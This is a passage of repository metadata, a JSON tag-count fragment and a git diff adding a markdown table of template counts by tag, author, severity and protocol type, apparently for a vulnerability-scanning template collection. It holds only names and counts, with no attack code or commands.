"name":"cloudinary","count":1},{"name":"panos","count":1},{"name":"expn","count":1},{"name":"nsasg","count":1},{"name":"tpshop","count":1},{"name":"selea","count":1},{"name":"jenkin","count":1},{"name":"servicenow","count":1},{"name":"razor","count":1},{"name":"erp-nc","count":1},{"name":"rujjie","count":1},{"name":"mongoshake","count":1},{"name":"sarg","count":1},{"name":"bitly","count":1},{"name":"setup","count":1},{"name":"soar","count":1},{"name":"plastic","count":1},{"name":"revision","count":1},{"name":"kafdrop","count":1},{"name":"netrc","count":1},{"name":"jenzabar","count":1},{"name":"spring","count":1},{"name":"tongda","count":1},{"name":"vsftpd","count":1},{"name":"b2evolution","count":1},{"name":"tensorflow","count":1},{"name":"weiphp","count":1},{"name":"javafaces","count":1},{"name":"nomad","count":1},{"name":"webmin","count":1},{"name":"status","count":1},{"name":"wiki","count":1},{"name":"codemeter","count":1},{"name":"skywalking","count":1},{"name":"emby","count":1},{"name":"cobub","count":1},{"name":"ganglia","count":1},{"name":"cve2010","count":1},{"name":"apiman","count":1},{"name":"visionhub","count":1},{"name":"robomongo","count":1},{"name":"xunchi","count":1},{"name":"redhat","count":1},{"name":"fuelcms","count":1},{"name":"mysql","count":1},{"name":"proftpd","count":1},{"name":"ulterius","count":1},{"name":"lansweeper","count":1},{"name":"fortilogger","count":1},{"name":"labtech","count":1},{"name":"netsweeper","count":1},{"name":"pgadmin","count":1},{"name":"ns","count":1},{"name":"arl","count":1},{"name":"moinmoin","count":1},{"name":"kong","count":1},{"name":"opensmtpd","count":1},{"name":"zzzcms","count":1},{"name":"octobercms","count":1},{"name":"upload","count":1},{"name":"pyramid","count":1},{"name":"moin","count":1},{"name":"vsphere","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"blackboard","count":1},{"name":"jitsi","count":1},{"name":"avtech","count":1},{"name":"opentsdb","count":1},{"name":"chinaunicom","count":1},{"name":"jeewms","count":1},{"name":"aspnuke","count":1},{"name":"doh","count":1},{"name":"metinfo","count":1},{"name":"igs","count":1},{"name":"viewpoint","count":1},{"name":"ssl","count":1},{"name":"tileserver","count":1},{"name":"saltapi","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":78},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":13},{"name":"milo2012","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"randomstr1ng","count":7},{"name":"that_juan_","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"r3dg33k","count":7},{"name":"melbadry9","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"__fazal","count":6},{"name":"philippedelteil","count":6},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"caspergn","count":5},{"name":"ganofins","count":5},{"name":"puzzlepeaches","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"rootxharsh","count":4},{"name":"iamnoooob","count":4},{"name":"nodauf","count":4},{"name":"0w4ys","count":3},{"name":"joanbono","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"kophjager007","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"fyoorer","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"foulenzer","count":2},{"name":"lu4nx","count":2},{"name":"incogbyte","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"0xprial","count":2},{"name":"bsysop","count":2},{"name":"amsda","count":2},{"name":"randomrobbie","count":2},{"name":"swissky","count":2},{"name":"manas_harsh","count":2},{"name":"jarijaas","count":2},{"name":"elsfa7110","count":2},{"name":"bp0lr","count":2},{"name":"0xsapra","count":2},{"name":"lotusdll","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"davidmckennirey","count":2},{"name":"hetroublemakr","count":2},{"name":"random-robbie","count":2},{"name":"joeldeleep","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xelkomy","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"unstabl3","count":2},{"name":"mavericknerd","count":2},{"name":"shifacyclewala","count":2},{"name":"moritz nentwig","count":2},{"name":"emenalf","count":2},{"name":"kiblyn11","count":2},{"name":"ehsahil","count":2},{"name":"toufik airane","count":1},{"name":"kurohost","count":1},{"name":"soyelmago","count":1},{"name":"b4uh0lz","count":1},{"name":"streetofhackerr007","count":1},{"name":"nkxxkn","count":1},{"name":"_darrenmartyn","count":1},{"name":"fabaff","count":1},{"name":"rtcms","count":1},{"name":"mubassirpatel","count":1},{"name":"regala_","count":1},{"name":"ahmed sherif","count":1},{"name":"vzamanillo","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"furkansenan","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"jeya seelan","count":1},{"name":"divya_mudgal","count":1},{"name":"daviey","count":1},{"name":"_c0wb0y_","count":1},{"name":"rodnt","count":1},{"name":"patralos","count":1},{"name":"s1r1u5_","count":1},{"name":"notsoevilweasel","count":1},{"name":"bjhulst","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"geraldino2","count":1},{"name":"koti2","count":1},{"name":"nytr0gen","count":1},{"name":"apt-mirror","count":1},{"name":"0h1in9e","count":1},{"name":"shifacyclewla","count":1},{"name":"gal nagli","count":1},{"name":"0ut0fb4nd","count":1},{"name":"exploitation","count":1},{"name":"wabafet","count":1},{"name":"berkdusunur","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"elmahdi","count":1},{"name":"ooooooo_q","count":1},{"name":"d0rkerdevil","count":1},{"name":"its0x08","count":1},{"name":"gboddin","count":1},{"name":"yavolo","count":1},{"name":"r3naissance","count":1},{"name":"abison_binoy","count":1},{"name":"0xtavian","count":1},{"name":"taielab","count":1},{"name":"th3.d1p4k","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"sshell","count":1},{"name":"schniggie","count":1},{"name":"hanlaomo","count":1},{"name":"52971","count":1},{"name":"pdp","count":1},{"name":"_generic_human_","count":1},{"name":"cookiehanhoan","count":1},{"name":"ipanda","count":1},{"name":"kareemse1im","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"luskabol","count":1},{"name":"fmunozs","count":1},{"name":"tim_koopmans","count":1},{"name":"sullo","count":1},{"name":"ilovebinbash","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"naglinagli","count":1},{"name":"micha3lb3n","count":1},{"name":"yashgoti","count":1},{"name":"sicksec","count":1},{"name":"mhdsamx","count":1},{"name":"idealphase","count":1},{"name":"yashanand155","count":1},{"name":"flag007","count":1},{"name":"ldionmarcil","count":1},{"name":"ringo","count":1},{"name":"akash.c","count":1},{"name":"remonsec","count":1},{"name":"dudez","count":1},{"name":"johnjhacking","count":1},{"name":"raesene","count":1},{"name":"smaranchand","count":1},{"name":"arcc","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"blckraven","count":1},{"name":"dawid czarnecki","count":1},{"name":"hakluke","count":1},{"name":"johnk3r","count":1},{"name":"sy3omda","count":1},{"name":"c3l3si4n","count":1},{"name":"alph4byt3","count":1},{"name":"ajaysenr","count":1},{"name":"rojanrijal","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"iampritam","count":1},{"name":"knassar702","count":1},{"name":"chron0x","count":1},{"name":"0xrod","count":1},{"name":"akshansh","count":1},{"name":"bolli95","count":1},{"name":"mohammedsaneem","count":1},{"name":"@dwisiswant0","count":1},{"name":"alifathi-h1","count":1},{"name":"fopina","count":1},{"name":"thevillagehacker","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"bing0o","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"luci","count":1},{"name":"pudsec","count":1},{"name":"becivells","count":1},{"name":"andirrahmani1","count":1},{"name":"shreyapohekar","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j33n1k4","count":1},{"name":"dogasantos","count":1},{"name":"kabirsuda","count":1},{"name":"w4cky_","count":1},{"name":"affix","count":1},{"name":"defr0ggy","count":1},{"name":"tirtha_mandal","count":1},{"name":"ohlinge","count":1},{"name":"shelld3v","count":1},{"name":"thezakman","count":1},{"name":"undefl0w","count":1},{"name":"zandros0","count":1},{"name":"deena","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"qlkwej","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"mah3sec_","count":1},{"name":"alex","count":1},{"name":"omarkurt","count":1},{"name":"sickwell","count":1},{"name":"_harleo","count":1},{"name":"zhenwarx","count":1},{"name":"juicypotato1","count":1},{"name":"vsh00t","count":1},{"name":"alperenkesk","count":1}],"directory":[{"name":"home","count":1591}],"severity":[{"name":"info","count":453},{"name":"high","count":396},{"name":"medium","count":312},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md new file mode 100644 index 0000000000..942ea53ea9 --- /dev/null +++ b/TEMPLATES-STATS.md @@ -0,0 +1,602 @@ +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------|-------|--------------------------------------------|-------|-----------|-------|----------|-------|---------|-------| +| cve | 462 | dhiyaneshdk | 202 | home | 1591 | info | 453 | http | 1408 | +| panel | 201 | pdteam | 184 | | | high | 396 | file | 42 | +| xss | 168 | pikpikcu | 177 | | | medium | 312 | network | 32 | +| wordpress | 166 | dwisiswant0 | 113 | | | critical | 186 | dns | 10 | +| rce | 161 | geeknik | 88 | | | low | 150 | | | +| exposure | 154 | daffainfo | 78 | | | | | | | +| cve2020 | 135 | madrobot | 59 | | | | | | | +| lfi | 127 | princechaddha | 50 | | | | | | | +| wp-plugin | 111 | gaurang | 42 | | | | | | | +| cve2019 | 82 | gy741 | 35 | | | | | | | +| config | 81 | ice3man | 26 | | | | | | | +| tech | 72 | pussycat0x | 25 | | | | | | | +| takeover | 71 | 0x_akoko | 20 | | | | | | | +| cve2021 | 70 | organiccrap | 19 | | | | | | | +| token | 63 | sheikhrishad | 15 | | | | | | | +| cve2018 | 61 | milo2012 | 13 | | | | | | | +| apache | 60 | techbrunchfr | 13 | | | | | | | +| default-login | 45 | suman_kar | 12 | | | | | | | +| cve2017 | 43 | pr3r00t | 12 | | | | | | | +| file | 42 | cyllective | 11 | | | | | | | +| unauth | 39 | random_robbie | 10 | | | | | | | +| network | 32 | righettod | 9 | | | | | | | +| iot | 32 | nadino | 8 | | | | | | | +| sqli | 29 | aashiq | 8 | | | | | | | +| oracle | 29 | wdahlenb | 8 | | | | | | | +| workflow | 28 | iamthefrogy | 8 | | | | | | | +| misc | 27 | hackergautam | 8 | | | | | | | +| atlassian | 26 | techryptic (@tech) | 7 | | | | | | | +| jira | 25 | randomstr1ng | 7 | | | | | | | +| ssrf | 25 | emadshanab | 7 | | | | | | | +| oob | 24 | dr_set | 7 | | | | | | | +| disclosure | 24 | melbadry9 | 7 | | | | | | | +| logs | 24 | 0x240x23elu | 7 | | | | | | | +| redirect | 20 | that_juan_ | 7 | | | | | | | +| aem | 18 | r3dg33k | 7 | | | | | | | +| listing | 15 | harshbothra_ | 7 | | | | | | | +| cisco | 15 | oppsec | 7 | | | | | | | +| cve2016 | 14 | philippedelteil | 6 | | | | | | | +| sap | 14 | __fazal | 6 | | | | | | | +| misconfig | 13 | yanyun | 5 | | | | | | | +| debug | 13 | pentest_swissky | 5 | | | | | | | +| cve2015 | 13 | panch0r3d | 5 | | | | | | | +| struts | 13 | ganofins | 5 | | | | | | | +| fuzz | 12 | caspergn | 5 | | | | | | | +| android | 12 | puzzlepeaches | 5 | | | | | | | +| weblogic | 12 | e_schultze_ | 4 | | | | | | | +| springboot | 11 | meme-lord | 4 | | | | | | | +| auth-bypass | 11 | rootxharsh | 4 | | | | | | | +| zoho | 11 | nodauf | 4 | | | | | | | +| dns | 11 | iamnoooob | 4 | | | | | | | +| devops | 10 | github.com/its0x08 | 4 | | | | | | | +| cve2011 | 10 | xelkomy | 4 | | | | | | | +| cve2012 | 9 | kophjager007 | 3 | | | | | | | +| dlink | 9 | yash anand @yashanand155 | 3 | | | | | | | +| jenkins | 9 | fyoorer | 3 | | | | | | | +| magento | 9 | tess | 3 | | | | | | | +| cnvd | 8 | f1tz | 3 | | | | | | | +| php | 8 | joanbono | 3 | | | | | | | +| ftp | 8 | thomas_from_offensity | 3 | | | | | | | +| gitlab | 8 | z3bd | 3 | | | | | | | +| cve2013 | 8 | impramodsargar | 3 | | | | | | | +| aws | 8 | binaryfigments | 3 | | | | | | | +| airflow | 8 | 0w4ys | 3 | | | | | | | +| adobe | 8 | shine | 3 | | | | | | | +| joomla | 7 | bsysop | 2 | | | | | | | +| cve2014 | 7 | afaq | 2 | | | | | | | +| vmware | 7 | incogbyte | 2 | | | | | | | +| scada | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| backup | 6 | zomsop82 | 2 | | | | | | | +| citrix | 6 | 0xprial | 2 | | | | | | | +| api | 6 | moritz nentwig | 2 | | | | | | | +| rconfig | 6 | amsda | 2 | | | | | | | +| cms | 6 | lu4nx | 2 | | | | | | | +| google | 6 | dheerajmadhukar | 2 | | | | | | | +| rails | 6 | foulenzer | 2 | | | | | | | +| xxe | 6 | davidmckennirey | 2 | | | | | | | +| nginx | 6 | ree4pwn | 2 | | | | | | | +| headless | 5 | hetroublemakr | 2 | | | | | | | +| jetty | 5 | joeldeleep | 2 | | | | | | | +| phpmyadmin | 5 | vavkamil | 2 | | | | | | | +| ruijie | 5 | elsfa7110 | 2 | | | | | | | +| lucee | 5 | mavericknerd | 2 | | | | | | | +| confluence | 5 | kiblyn11 | 2 | | | | | | | +| drupal | 5 | 0xcrypto | 2 | | | | | | | +| java | 5 | ehsahil | 2 | | | | | | | +| ssti | 5 | emenalf | 2 | | | | | | | +| iis | 5 | lotusdll | 2 | | | | | | | +| login | 5 | manas_harsh | 2 | | | | | | | +| circarlife | 5 | 0xrudra | 2 | | | | | | | +| solr | 5 | pxmme1337 | 2 | | | | | | | +| laravel | 5 | udit_thakkur | 2 | | | | | | | +| dell | 5 | swissky | 2 | | | | | | | +| cve2009 | 4 | bp0lr | 2 | | | | | | | +| thinkphp | 4 | jarijaas | 2 | | | | | | | +| nodejs | 4 | 0xelkomy | 2 | | | | | | | +| solarwinds | 4 | unstabl3 | 2 | | | | | | | +| samsung | 4 | gevakun | 2 | | | | | | | +| elastic | 4 | shifacyclewala | 2 | | | | | | | +| fileupload | 4 | 0xsapra | 2 | | | | | | | +| django | 4 | random-robbie | 2 | | | | | | | +| ibm | 4 | randomrobbie | 2 | | | | | | | +| router | 4 | x1m_martijn | 2 | | | | | | | +| jolokia | 4 | _generic_human_ | 1 | | | | | | | +| webserver | 4 | fabaff | 1 | | | | | | | +| netgear | 4 | aceseven (digisec360) | 1 | | | | | | | +| docker | 4 | yashgoti | 1 | | | | | | | +| magmi | 4 | dudez | 1 | | | | | | | +| moodle | 4 | d0rkerdevil | 1 | | | | | | | +| hongdian | 4 | ringo | 1 | | | | | | | +| traversal | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| artifactory | 4 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| vpn | 4 | knassar702 | 1 | | | | | | | +| thinkcmf | 4 | soyelmago | 1 | | | | | | | +| asp | 4 | defr0ggy | 1 | | | | | | | +| tomcat | 4 | ajaysenr | 1 | | | | | | | +| r-seenet | 3 | co0nan | 1 | | | | | | | +| mongodb | 3 | toufik airane | 1 | | | | | | | +| kubernetes | 3 | th3.d1p4k | 1 | | | | | | | +| windows | 3 | alifathi-h1 | 1 | | | | | | | +| slack | 3 | akash.c | 1 | | | | | | | +| nosqli | 3 | divya_mudgal | 1 | | | | | | | +| amazon | 3 | 52971 | 1 | | | | | | | +| bypass | 3 | b4uh0lz | 1 | | | | | | | +| microstrategy | 3 | kurohost | 1 | | | | | | | +| openssh | 3 | sy3omda | 1 | | | | | | | +| vbulletin | 3 | raesene | 1 | | | | | | | +| backups | 3 | _c0wb0y_ | 1 | | | | | | | +| ofbiz | 3 | notsoevilweasel | 1 | | | | | | | +| springcloud | 3 | ooooooo_q | 1 | | | | | | | +| printer | 3 | mubassirpatel | 1 | | | | | | | +| kafka | 3 | mhdsamx | 1 | | | | | | | +| fanruan | 3 | thezakman | 1 | | | | | | | +| deserialization | 3 | smaranchand | 1 | | | | | | | +| fpd | 3 | rtcms | 1 | | | | | | | +| terramaster | 3 | naglinagli | 1 | | | | | | | +| git | 3 | ipanda | 1 | | | | | | | +| dedecms | 3 | koti2 | 1 | | | | | | | +| ebs | 3 | yavolo | 1 | | | | | | | +| grafana | 3 | whynotke | 1 | | | | | | | +| ssh | 3 | mohammedsaneem | 1 | | | | | | | +| caucho | 3 | rodnt | 1 | | | | | | | +| resin | 3 | affix | 1 | | | | | | | +| nacos | 3 | ldionmarcil | 1 | | | | | | | +| lfr | 3 | _harleo | 1 | | | | | | | +| log | 3 | wabafet | 1 | | | | | | | +| crlf | 3 | vsh00t | 1 | | | | | | | +| oa | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| prometheus | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| hjtcloud | 2 | r3naissance | 1 | | | | | | | +| telerik | 2 | streetofhackerr007 | 1 | | | | | | | +| ucmdb | 2 | s1r1u5_ | 1 | | | | | | | +| nextjs | 2 | shifacyclewla | 1 | | | | | | | +| strapi | 2 | yashanand155 | 1 | | | | | | | +| ecology | 2 | taielab | 1 | | | | | | | +| hp | 2 | becivells | 1 | | | | | | | +| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| globalprotect | 2 | shreyapohekar | 1 | | | | | | | +| rstudio | 2 | micha3lb3n | 1 | | | | | | | +| wordfence | 2 | bad5ect0r | 1 | | | | | | | +| yapi | 2 | hanlaomo | 1 | | | | | | | +| bitrix | 2 | fopina | 1 | | | | | | | +| sonicwall | 2 | alperenkesk | 1 | | | | | | | +| openfire | 2 | alph4byt3 | 1 | | | | | | | +| keycloak | 2 | regala_ | 1 | | | | | | | +| couchdb | 2 | andirrahmani1 | 1 | | | | | | | +| sharepoint | 2 | gboddin | 1 | | | | | | | +| intrusive | 2 | its0x08 | 1 | | | | | | | +| plesk | 2 | noamrathaus | 1 | | | | | | | +| mida | 2 | 0h1in9e | 1 | | | | | | | +| activemq | 2 | manuelbua | 1 | | | | | | | +| showdoc | 2 | flag007 | 1 | | | | | | | +| microsoft | 2 | shelld3v | 1 | | | | | | | +| nagios | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| voipmonitor | 2 | qlkwej | 1 | | | | | | | +| frp | 2 | luci | 1 | | | | | | | +| idrac | 2 | deena | 1 | | | | | | | +| saltstack | 2 | bjhulst | 1 | | | | | | | +| sonarqube | 2 | omarkurt | 1 | | | | | | | +| vrealize | 2 | berkdusunur | 1 | | | | | | | +| spark | 2 | tirtha_mandal | 1 | | | | | | | +| smtp | 2 | 0xrod | 1 | | | | | | | +| chamilo | 2 | furkansenan | 1 | | | | | | | +| injection | 2 | pdp | 1 | | | | | | | +| maian | 2 | dogasantos | 1 | | | | | | | +| cache | 2 | luskabol | 1 | | | | | | | +| icewarp | 2 | apt-mirror | 1 | | | | | | | +| service | 2 | iampritam | 1 | | | | | | | +| waf | 2 | ohlinge | 1 | | | | | | | +| natshell | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| paloalto | 2 | rojanrijal | 1 | | | | | | | +| nexus | 2 | ahmed sherif | 1 | | | | | | | +| bigip | 2 | johnjhacking | 1 | | | | | | | +| seeyon | 2 | arcc | 1 | | | | | | | +| webcam | 2 | hakluke | 1 | | | | | | | +| proxy | 2 | thevillagehacker | 1 | | | | | | | +| smb | 2 | kareemse1im | 1 | | | | | | | +| hpe | 2 | abison_binoy | 1 | | | | | | | +| mail | 2 | tim_koopmans | 1 | | | | | | | +| kibana | 2 | sshell | 1 | | | | | | | +| exposures | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| emerge | 2 | jeya seelan | 1 | | | | | | | +| leak | 2 | alex | 1 | | | | | | | +| xxljob | 2 | 0xtavian | 1 | | | | | | | +| openam | 2 | kabirsuda | 1 | | | | | | | +| huawei | 2 | nkxxkn | 1 | | | | | | | +| glassfish | 2 | bolli95 | 1 | | | | | | | +| coldfusion | 2 | schniggie | 1 | | | | | | | +| zhiyuan | 2 | 0ut0fb4nd | 1 | | | | | | | +| fortios | 2 | gal nagli | 1 | | | | | | | +| zabbix | 2 | sicksec | 1 | | | | | | | +| pega | 2 | juicypotato1 | 1 | | | | | | | +| dos | 2 | _darrenmartyn | 1 | | | | | | | +| hashicorp | 2 | fmunozs | 1 | | | | | | | +| httpd | 2 | @github.com/defr0ggy | 1 | | | | | | | +| shellshock | 2 | cookiehanhoan | 1 | | | | | | | +| jboss | 2 | absshax | 1 | | | | | | | +| splunk | 2 | dawid czarnecki | 1 | | | | | | | +| odoo | 2 | idealphase | 1 | | | | | | | +| cve2008 | 2 | sickwell | 1 | | | | | | | +| rockmongo | 2 | zandros0 | 1 | | | | | | | +| jellyfin | 2 | undefl0w | 1 | | | | | | | +| kentico | 2 | daviey | 1 | | | | | | | +| oauth | 2 | exploitation | 1 | | | | | | | +| rockethchat | 2 | j33n1k4 | 1 | | | | | | | +| trixbox | 2 | remonsec | 1 | | | | | | | +| rdp | 1 | nytr0gen | 1 | | | | | | | +| jfrog | 1 | j3ssie/geraldino2 | 1 | | | | | | | +| geutebruck | 1 | akshansh | 1 | | | | | | | +| robomongo | 1 | chron0x | 1 | | | | | | | +| spring | 1 | zhenwarx | 1 | | | | | | | +| proftpd | 1 | willd96 | 1 | | | | | | | +| ueditor | 1 | ratnadip gajbhiye | 1 | | | | | | | +| ec2 | 1 | bing0o | 1 | | | | | | | +| szhe | 1 | elmahdi | 1 | | | | | | | +| nps | 1 | w4cky_ | 1 | | | | | | | +| axis | 1 | pudsec | 1 | | | | | | | +| zzzcms | 1 | c3l3si4n | 1 | | | | | | | +| blue-ocean | 1 | mah3sec_ | 1 | | | | | | | +| viewlinc | 1 | geraldino2 | 1 | | | | | | | +| kubeflow | 1 | kba@sogeti_esec | 1 | | | | | | | +| wooyun | 1 | patralos | 1 | | | | | | | +| tika | 1 | sullo | 1 | | | | | | | +| rmi | 1 | johnk3r | 1 | | | | | | | +| ilo4 | 1 | @dwisiswant0 | 1 | | | | | | | +| springframework | 1 | ilovebinbash | 1 | | | | | | | +| zmanda | 1 | blckraven | 1 | | | | | | | +| yachtcontrol | 1 | vzamanillo | 1 | | | | | | | +| jquery | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| cve2007 | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| revision | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| targa | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | 